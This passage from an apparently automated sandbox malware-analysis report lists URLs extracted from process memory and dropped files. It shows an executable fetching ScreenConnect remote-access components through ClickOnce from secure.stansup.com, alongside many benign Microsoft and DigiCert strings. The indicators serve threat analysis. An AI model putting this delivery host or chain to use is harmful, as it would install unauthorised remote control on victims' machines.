                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606146070.000001E11B902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449163032.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
                  Source: svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlepk
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsx
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/Mic
                  Source: dfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.
                  Source: dfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c
                  Source: Qjq85KfhBC.exe, 00000000.00000002.1445501228.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digi
                  Source: dfsvc.exe, 00000001.00000002.2237356712.0000021CE89F0000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2237356712.0000021CE89F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2238360883.0000021CE8AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crll
                  Source: svchost.exe, 00000008.00000003.1455371851.000001E11BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B0F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000008.00000003.1449293708.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1433346941.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policysrf
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scken
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000008.00000003.1433983414.000001E11B959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449639366.000001E11B077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605566534.000001E11B07A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000008.00000002.2606537340.000001E11BE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD023A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1810637519.0000000001CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD083D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD08A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601Auth
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601roofManage
                  Source: svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603rf
                  Source: svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604fg:Complet
                  Source: svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605teAccountC
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384073807.000001E11B957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 00000007.00000003.1377739911.000002074AE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B0F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B0F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502rise
                  Source: svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600gin.
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601/log
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtm
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, 3Q2U6NXT.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD041A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllY
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exeo
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dllL
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config0
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configC
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe:U
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exebT
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exek
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configHW
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configrW6z
                  Source: dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe7
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
